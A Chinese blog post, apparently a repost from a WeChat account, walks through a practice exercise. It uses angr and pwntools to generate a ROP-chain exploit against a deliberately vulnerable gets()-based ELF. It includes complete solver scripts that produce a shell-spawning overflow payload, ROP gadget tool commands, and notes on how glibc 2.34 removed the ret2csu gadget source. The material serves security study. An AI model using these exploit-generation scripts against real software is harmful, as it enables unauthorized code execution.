Angr符号执行练习Auto Rop Generation

2025年4月12日14:53:45评论8 views字数 15540阅读51分48秒阅读模式

创建: 2025-04-10 11:44
更新: 2025-04-12 13:57
链接: https://scz.617.cn/unix/202504101144.txt

目录:

    ☆ 目标ELF
    ☆ buffer_overflow_64bit_solver.py
    ☆ ROP工具
    ☆ buffer_overflow_64bit_solver_a.py
    ☆ 为什么buffer_overflow_64bit_bad不能用于演示

☆ 目标ELF

参看

Automatic Rop Chain Generation - [2022-01-16]
https://breaking-bits.gitbook.io/breaking-bits/vulnerability-discovery/automatic-exploit-generation/automatic-rop-chain-generation

此题作者已提供求解程序，本文只是学习所涉及的技术，无原创内容。

buffer_overflow.c是目标源码，buffer_overflow_64bit是预编译的目标ELF。

int pwn_me()
{
    char my_buf[20] = {'x00'};
    printf("Your buffer is at %pn", my_buf);
    /*
     * 栈溢出
     */
    gets(my_buf);
    return 0;
}

void does_nothing()
{
    puts("/bin/sh");
    execve(NULL,NULL,NULL);
    system("sleep 1");
}

void main()
{
    puts("pwn_me:");
    pwn_me();
}

$ file -b buffer_overflow_64bit
ELF 64-bit LSB executable, x86-64, version 1 (SYSV), ..., not stripped

$ rabin2 -I buffer_overflow_64bit
canary   false      // 无"stack canary"
injprot  false      // 据此推断无ASLR
linenum  true       // 包含行号信息
lsyms    true       // 包含调试符号
nx       true       // 启用NX位保护，栈区不可执行
relocs   true       // 包含重定位信息
relro    partial    // 指Relocation Read-Only部分启用
sanitize false      // 编译时未使用AddressSanitizer之类技术
static   false      // 动态链接
stripped false      // 未strip

(输出有删减)

本次练习目的是，用angr加pwn自动生成基于ROP的Exploit。

gets()触发栈溢出，栈区不可执行，必须用ROP技术。

does_nothing()是刻意提供给做题者的，贴心地提供了ROP所需的一切元素，可用的关键函数、关键字符串。若从源码编译生成目标ELF，不要启用优化，否则未用代码可能被丢弃。即便如此，仍不建议从源码生成ELF，原因后面再说。

☆ buffer_overflow_64bit_solver.py

import sys, os, time, base64, logging
import angr, claripy
import pwn

def generate_standard_rop_chain ( binary ) :

    logging.getLogger( 'pwnlib.elf.elf' ).setLevel( logging.ERROR )
    logging.getLogger( 'pwnlib.rop.rop' ).setLevel( logging.ERROR )

    pwn.context.clear()
    pwn.context.arch 
                    = 'amd64'
    pwn.context.os  = 'linux'
    pwn.context.binary 
                    = binary
    elf             = pwn.ELF( binary )
    rop             = pwn.ROP( elf )

    strings         = [ b"/bin/sh", b"/bin/bash" ]
    functions       = [ "system", "execve" ]
    ret_func        = None
    ret_string      = None
    for function in functions :
        if function in elf.plt :
            ret_func    = elf.plt[function]
            break
        elif function in elf.symbols :
            ret_func    = elf.symbols[function]
            break
    if not ret_func :
        raise RuntimeError( "Cannot find symbol to return to" )

    for string in strings :
        #
        # elf.search() returns an iterator
        #
        str_occurences  = list( elf.search( string ) )
        if str_occurences :
            ret_string  = str_occurences[0]
            break
    if not ret_string :
        raise RuntimeError( "Cannot find string to pass to system or exec" )

    #
    # On 64-bit Linux (amd64), the system function (often implemented in
    # libc) might use movaps instructions which require the stack pointer
    # (rsp) to be 16-byte aligned. Sometimes, the state of the stack just
    # before calling system via ROP leaves it misaligned (e.g., aligned to
    # 8 bytes but not 16). Adding a single ret gadget advances the stack
    # pointer by one word (8 bytes on amd64), potentially fixing this
    # alignment issue.
    #
    # 是否增加这个ret，以实测为准，这不是包打天下的Fix
    #
    rop.raw( rop.ret.address )
    #
    # 通常会在栈上生成类似[pop_rdi_ret][ret_string][ret_func]的序列
    #
    rop.call( ret_func, [ret_string] )
    #
    # 0x0000:         0x40101a ret
    # 0x0008:         0x4012d3 pop rdi; ret
    # 0x0010:         0x40201a [arg0] rdi = 4202522 // 4202522=0x40201a
    # 0x0018:         0x401094
    #
    try :
        print( rop.dump() )
    except Exception as e :
        print( f"Couldn't automatically find a way: {e}", file=sys.stderr )
        sys.exit( -1 )
    return rop, rop.build()

#
# 此函数并非通用实现，只适用于"pop|ret"情形
#
def do_64bit_rop_with_stepping ( elf, rop, rop_chain, state ) :
    #
    # rop_chain是代码地址、数据地址或整数构成的list
    #
    # rop.gadgets是所有的gadget，是个字典，key是代码地址
    #
    # print( rop_chain )
    # print( rop.gadgets )

    curr_rop    = None
    elf_symbol_addrs 
                = [y for x, y in elf.symbols.items()]

    for i, gadget in enumerate( rop_chain ) :
        #
        # We generally have two constraining mode
        #
        # 1. running a code gadget
        # 2. setting a register to an expected popped value
        #

        #
        # gadget有可能不是代码地址，而是数据地址或整数
        #
        if gadget in rop.gadgets :
            curr_rop    = rop.gadgets[gadget]
            #
            # reversing it lets us pop values out easy
            #
            # list用pop()时，从尾部弹，用pop(0)时，从首部弹，但pop(0)性能
            # 不好，对大list尤其如此，不建议用pop(0)，所以此处先reverse()
            #
            curr_rop.regs.reverse()
        #
        # Case 1: running a code gadget
        #
        # We keep track of the number of registers our gadget popped, and
        # if it's 0, then we're just executing
        #
        if curr_rop is None or gadget in rop.gadgets or len( curr_rop.regs ) == 0 :
            desire  = state.regs.pc == gadget
            if state.satisfiable( extra_constraints=( desire, ) ) :
                #
                # This process is slower than just setting the whole stack
                # to the chain, but in testing it seems to work more
                # reliably
                #
                print( "Setting PC to {}".format( hex( gadget ) ) )
                state.add_constraints( desire )

                #
                # Since we're emulating the program's execution with angr
                # we will run into an issue when executing any symbols.
                # Where a SimProcedure will get executed instead of the
                # real function, which then gives us the wrong constraints
                # /execution for our rop_chain
                #
                if gadget in elf_symbol_addrs :
                    item            = [x for x in elf.symbols.items() if gadget == x[1]][0]
                    state.regs.pc   = state.project.loader.find_symbol( item[0] ).rebased_addr
                    print( f"Gadget '{item[0]}' is hooked symbol, contraining to real address, but calling SimProc" )

                if i == len( rop_chain ) - 1 :
                    break

                sm      = state.project.factory.simulation_manager( state )
                #
                # opt_level=0 这是关键。它告诉angr的VEX引擎禁用或减少优化。
                # 默认情况下，angr会尝试一次性分析和提升(lift)一个基本块
                # (basic block)的VEX IR。对于ROP gadget这种通常很短、以ret
                # 结尾的代码片段，默认优化可能会导致模拟行为与实际CPU执行
                # 不完全一致，或者一次模拟了过多指令。opt_level=0 强制angr
                # 更接近单步执行，更精确地模拟ROP gadget的效果。
                #
                sm.explore( opt_level=0 )
                if sm.unconstrained :
                    state   = sm.unconstrained[0]
                else :
                    print( "sm.unconstrained[] is empty", file=sys.stderr )
                    sys.exit( -1 )
            else :
                print( "Unsatisfied setting PC to {}".format( hex( gadget ) ), file=sys.stderr )
                sys.exit( -1 )
        #
        # Case 2: setting a register to an expected popped value
        #
        else :
            #
            # pop()从尾部弹，由于事先reverse()过，所以此刻的pop()相当于取
            # 代码中正序第一个寄存器
            #
            next_reg    = curr_rop.regs.pop()
            if type( next_reg ) is not str :
                print( "type( next_reg ) is not str", file=sys.stderr )
                sys.exit( -1 )
            print( "Setting register {}".format( next_reg ) )

            gadget_msg  = gadget
            if isinstance( gadget, int ) :
                gadget_msg = hex( gadget )

            state_reg   = getattr( state.regs, next_reg )
            desire      = state_reg == gadget
            if state_reg.symbolic and state.satisfiable( extra_constraints=( desire, ) ):
                print( "Setting register {} to {}".format( next_reg, gadget_msg ) )
                state.add_constraints( desire )
            else:
                print( "Unsatisfied on setting {} to {}".format( next_reg, gadget_msg ), file=sys.stderr )
                sys.exit( -1 )

            if len( curr_rop.regs ) == 0 :
                curr_rop    = None

    return state

def get_input ( state ) :

    logging.getLogger( 'pwnlib.elf.elf' ).setLevel( logging.ERROR )

    copy_state  = state.copy()
    binary      = state.project.filename
    elf         = pwn.ELF( binary )
    rop, rop_chain 
                = generate_standard_rop_chain( binary )
    new_state   = do_64bit_rop_with_stepping(
        elf, rop, rop_chain, copy_state
    )
    input       = new_state.posix.dumps( sys.stdin.fileno() )
    return input

def check_mem_corruption ( sm ) :
    if len( sm.unconstrained ) :
        for u in sm.unconstrained :
            desire  = u.regs.pc == 0x41414141
            if u.satisfiable( extra_constraints=( desire, ) ) :
                sth = u.posix.dumps( sys.stdin.fileno(), extra_constraints=( desire, ) )
                # print( sth )
                print( "RetAddr offset is {}".format( sth.index( b"AAAA" ) ) )
                u.globals["input"] 
                    = get_input( u )
                sm.stashes['found'].append( u )
                sm.stashes['unconstrained'].remove( u )
                sm.drop( stash='active' )
                break
    return sm

def main ( argv ) :

    logging.getLogger( 'angr.engines.successors' ).setLevel( logging.ERROR )
    logging.getLogger( 'angr.procedures.libc.gets' ).setLevel( logging.ERROR )

    proj        = angr.Project( argv[1], auto_load_libs=False )
    magic_size  = 128
    magic       = claripy.BVS( "magic", magic_size * 8 )
    init_state  = proj.factory.full_init_state(
        stdin       = angr.SimFileStream(
            name    = 'stdin',
            content = magic,
            has_end = True
        ),
    )
    #
    # 设置angr模拟的libc中，用于标准输入/输出缓冲区的符号字节数限制。angr
    # 在处理标准输入输出时，为了性能考虑，可能不会让整个流都是符号化的。这
    # 个选项告诉angr，对于stdin/stdout/stderr，最多将前多少字节视为符号化
    # 的。如果程序读取超过这个数量的数据，angr可能会选择将后续读取的数据具
    # 体化(变成某个具体值)，或者采取其他策略。设置一个足够大的值，有助于确
    # 保我们的符号输入magic能够覆盖到需要溢出的缓冲区。
    #
    # 本例比较特殊，实测表明，不设也可以，但建议设置
    #
    # 默认是60
    #
    init_state.libc.buf_symbolic_bytes 
                = magic_size
    sm          = proj.factory.simulation_manager(
        init_state,
        save_unconstrained  = True,
        stashes             = {
            'active'        : [init_state],
            'unconstrained' : [],
            'found'         : [],
        }
    )
    sm.explore( step_func=check_mem_corruption )
    if not sm.found :
        return
    raw         = sm.found[0].globals["input"]
    somefile    = '/tmp/some.bin'
    with open( somefile, "wb" ) as f :
        f.write( raw )
    print( "cat {} - | ./{}".format( somefile, argv[1] ) )
    solution    = base64.b64encode( raw ).decode( 'utf-8' )
    print( '(echo -ne "%s" | base64 -d;cat -) | ./%s' % ( solution, argv[1] ) )

if "__main__" == __name__ :
    start   = time.time()
    main( sys.argv )
    end     = time.time()
    print( "Time elapsed: {}".format( end - start ) )

说一下总体思路。靠check_mem_corruption()找到RetAddr可控的状态。靠get_input获取用于栈溢出的input。靠generate_standard_rop_chain()获取rop chain，这步与angr无关，只与pwn模块有关；某种意义上"Auto ROP Generation"是个噱头，让人误以为是angr找到的rop chain。靠do_64bit_rop_with_stepping()约束求解，确保rop chain得到执行。

rop.gadgets[addr].regs[]是个list，元素可能是这段gadget所修改的寄存器名，也可能是个整数。观察rop.gadgets

4198423: Gadget(0x401017, ['add esp, 8', 'ret'], [8], 0x10),
4198422: Gadget(0x401016, ['add rsp, 8', 'ret'], [8], 0x10),
4198919: Gadget(0x401207, ['leave', 'ret'], ['rbp', 'rsp'], 0x2540be407),
4199116: Gadget(0x4012cc, ['pop r12', 'pop r13', 'pop r14', 'pop r15', 'ret'], ['r12', 'r13', 'r14', 'r15'], 0x28),
4199118: Gadget(0x4012ce, ['pop r13', 'pop r14', 'pop r15', 'ret'], ['r13', 'r14', 'r15'], 0x20),
4199120: Gadget(0x4012d0, ['pop r14', 'pop r15', 'ret'], ['r14', 'r15'], 0x18),
4199122: Gadget(0x4012d2, ['pop r15', 'ret'], ['r15'], 0x10),
4199115: Gadget(0x4012cb, ['pop rbp', 'pop r12', 'pop r13', 'pop r14', 'pop r15', 'ret'], ['rbp', 'r12', 'r13', 'r14', 'r15'], 0x30),
4199119: Gadget(0x4012cf, ['pop rbp', 'pop r14', 'pop r15', 'ret'], ['rbp', 'r14', 'r15'], 0x20), 4198813: Gadget(0x40119d, ['pop rbp', 'ret'], ['rbp'], 0x10),
4199123: Gadget(0x4012d3, ['pop rdi', 'ret'], ['rdi'], 0x10),
4199121: Gadget(0x4012d1, ['pop rsi', 'pop r15', 'ret'], ['rsi', 'r15'], 0x18),
4199117: Gadget(0x4012cd, ['pop rsp', 'pop r13', 'pop r14', 'pop r15', 'ret'], ['rsp', 'r13', 'r14', 'r15'], 0x28),
4198426: Gadget(0x40101a, ['ret'], [], 0x8)

Gadget()的第3列(从1计)即regs[]，大多数时候是一系列寄存器名，有时是[8]这种，有时是[]。很容易辨别出regs[]的含义，处理regs[]要考虑这些可能性。

☆ ROP工具

参看

https://docs.pwntools.com/en/stable/rop/rop.html

ROPgadget Tool
https://github.com/JonathanSalwan/ROPgadget

Ropper
https://github.com/sashs/Ropper

python3 ROPgadget.py --help
python3 ROPgadget.py --binary buffer_overflow_64bit --only "pop|ret"
python3 ROPgadget.py --binary buffer_overflow_64bit --ropchain

python3 Ropper.py -h
python3 Ropper.py -f buffer_overflow_64bit --search "pop rdi"
python3 Ropper.py -f buffer_overflow_64bit --search "pop r??; ret"
python3 Ropper.py -f buffer_overflow_64bit --search "pop r??; ret" --detail

指定--detail时，每行对应一条指令，否则所有指令以分号为分隔符显示在一行

python3 Ropper.py -f buffer_overflow_64bit --search "mov rax, [%]"
python3 Ropper.py -f buffer_overflow_64bit --search "mov rax, [%]; %; call rax"
python3 Ropper.py -f buffer_overflow_64bit --search "mov rax, [%]; %; call rax" --quality 3
python3 Ropper.py -f buffer_overflow_64bit --search "mov rax, [%]; %; call rax" --quality 3 --detail

quality为1表示最好，但可能无解，为10表示最差，可能有多解

☆ buffer_overflow_64bit_solver_a.py

可在栈上直接放置rop chain，更简洁。原注释中说，用angr模拟执行rop chain更可靠，这才使用复杂的do_64bit_rop_with_stepping()，单就本例而言，无此必要。下例修改两个函数，并删掉do_64bit_rop_with_stepping()。

def get_input ( state, prefix ) :

    logging.getLogger( 'pwnlib.elf.elf' ).setLevel( logging.ERROR )

    binary      = state.project.filename
    elf         = pwn.ELF( binary )
    rop, rop_chain 
                = generate_standard_rop_chain( binary )
    input       = prefix
    #
    # 在栈上直接放置rop chain
    #
    for item in rop_chain :
        if not isinstance( item, int ) :
            raise TypeError( f"ROP chain item is not an integer: {item} ({type(item)})" )
        #
        # Pack the 64-bit integer into 8 bytes, little-endian
        #
        item    = item.to_bytes( 8, byteorder='little', signed=False )
        input  += item
    return input

def check_mem_corruption ( sm ) :
    if len( sm.unconstrained ) :
        for u in sm.unconstrained :
            desire  = u.regs.pc == 0x41414141
            if u.satisfiable( extra_constraints=( desire, ) ) :
                sth = u.posix.dumps( sys.stdin.fileno(), extra_constraints=( desire, ) )
                off = sth.index( b"AAAA" )
                print( "RetAddr offset is {}".format( off ) )
                sth = sth[0:off]
                u.globals["input"] 
                    = get_input( u, sth )
                sm.stashes['found'].append( u )
                sm.stashes['unconstrained'].remove( u )
                sm.drop( stash='active' )
                break
    return sm

☆ 为什么buffer_overflow_64bit_bad不能用于演示

从源码生成buffer_overflow_64bit_bad

gcc-11 -fno-stack-protector 
-Wno-implicit-function-declaration -Wno-format-security 
-no-pie -z relro buffer_overflow.c -o buffer_overflow_64bit_bad

在buffer_overflow_64bit中寻找rop chain时，需要找"pop rdi; ret"。确实找到了，在0x4012d3，这是__libc_csu_init()中一段代码。本来是"pop r15"，但从中间执行时，可以解释成"pop rdi"。

gdb -q -nx --args ./buffer_overflow_64bit anything

starti

(gdb) x/2i 0x4012d3
   0x4012d3 <__libc_csu_init+99>:       pop    %rdi
   0x4012d4 <__libc_csu_init+100>:      ret
(gdb) x/2bx 0x4012d3
0x4012d3 <__libc_csu_init+99>:  0x5f    0xc3

/*
 * buffer_overflow_64bit
 */
00000000004010D0                         _start
...
00000000004010E3 49 C7 C0 E0 12 40 00        mov     r8, offset __libc_csu_fini  ; fini
00000000004010EA 48 C7 C1 70 12 40 00        mov     rcx, offset __libc_csu_init ; init
00000000004010F1 48 C7 C7 45 12 40 00        mov     rdi, offset main            ; main
00000000004010F8 FF 15 F2 2E 00 00           call    cs:__libc_start_main_ptr
00000000004010FE F4                          hlt

0000000000401270                         __libc_csu_init
...
/*
 * rop chain
 */
00000000004012D2 41 5F                       pop     r15
00000000004012D4 C3                          retn

但用gcc 11.3.0编译得到的buffer_overflow_64bit_bad，找不到"pop rdi; ret"。原因是，bad版本的fini、init初始化成NULL，ELF中没有__libc_csu_init()的代码。偏偏只有_libc_csu_init()中有"pop rdi; ret"，且未找到其他达成同一目的的rop chain，用多种ROP工具均未找到替代方案。

/*
 * buffer_overflow_64bit_bad
 */
00000000004010D0                         _start
...
/*
 * 初始化成NULL
 */
00000000004010E3 45 31 C0                    xor     r8d, r8d                    ; fini
00000000004010E6 31 C9                       xor     ecx, ecx                    ; init
00000000004010E8 48 C7 C7 4E 12 40 00        mov     rdi, offset main            ; main
00000000004010EF FF 15 FB 2E 00 00           call    cs:__libc_start_main_ptr
00000000004010F5 F4                          hlt

$ python3 buffer_overflow_64bit_solver.py buffer_overflow_64bit_bad
RetAddr offset is 40
[ERROR] Could not satisfy setRegisters({'rdi': 4202522})
ERROR    | 2025-04-09 22:23:10,945 | pwnlib.rop.rop | Could not satisfy setRegisters({'rdi': 4202522})
Couldn't automatically find a way: Could not satisfy setRegisters({'rdi': 4202522})

暂时不知如何调整gcc编译选项，使得init初始化成__libc_csu_init。

小侯看到此处时，说这事与gcc版本无关，与glibc版本相关，是2.34引入的安全升级所致，定向针对ret2csu技术。

如下命令可查看当前glibc版本，但第一个并不可靠，推荐后两个

ldd --version
/lib/x86_64-linux-gnu/libc.so.6
$(ldd /bin/ls | cut -d' ' -f3 | grep libc.so.)

本文测试环境glibc版本2.35

参看

https://github.com/bminor/glibc/commit/035c012e32c11e84d64905efaf55e74f704d3668

2.34之前有"csu/elf-init.c"，其中有__libc_csu_init()，会调用init_array[]。2.34删除elf-init.c，也就删除了__libc_csu_init()等函数。

2.34的"csu/libc-start.c"中有call_init()，会调用init_array[]。

__libc_csu_init()位于main()所在ELF中，call_init()位于ld-linux-x86-64.so.2(动态链接器)中，ASLR对后者影响更大。

CTF选手应该一眼熟，我没打过CTF，对这些细微变化不甚了解。

原文始发于微信公众号（青衣十三楼飞花堂）：Angr符号执行练习Auto Rop Generation

免责声明:文章中涉及的程序(方法)可能带有攻击性，仅供安全研究与教学之用，读者将其信息做其他用途，由读者承担全部法律及连带责任，本站不承担任何法律及连带责任；如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截，联系方式见首页)，望知悉。

左青龙
微信扫一扫

右白虎
微信扫一扫

Angr符号执行练习Auto Rop Generation

Docker配置了daemon镜像源但未生效，仍走默认源的解决办法

G.O.S.S.I.P 阅读推荐 2025-06-26 RAG Trackback

如何做好IT资产管理

近期勒索软件组织Qilin如此活跃 | 什么来头？

5 分钟零配置！一键搭建局域网文件共享服务器（手机 / 电脑互传必备）

0day漏洞攻防竞赛：东大与美国的隐秘战争

BreachForums暗网论坛看来是真凉了

NSFOCUS旧友记王艳《往事值得回味》

信息科技关键风险指标监测（ KRI ）

Splunk系列：Splunk字段提取篇（三）

发表评论

在线咨询

微信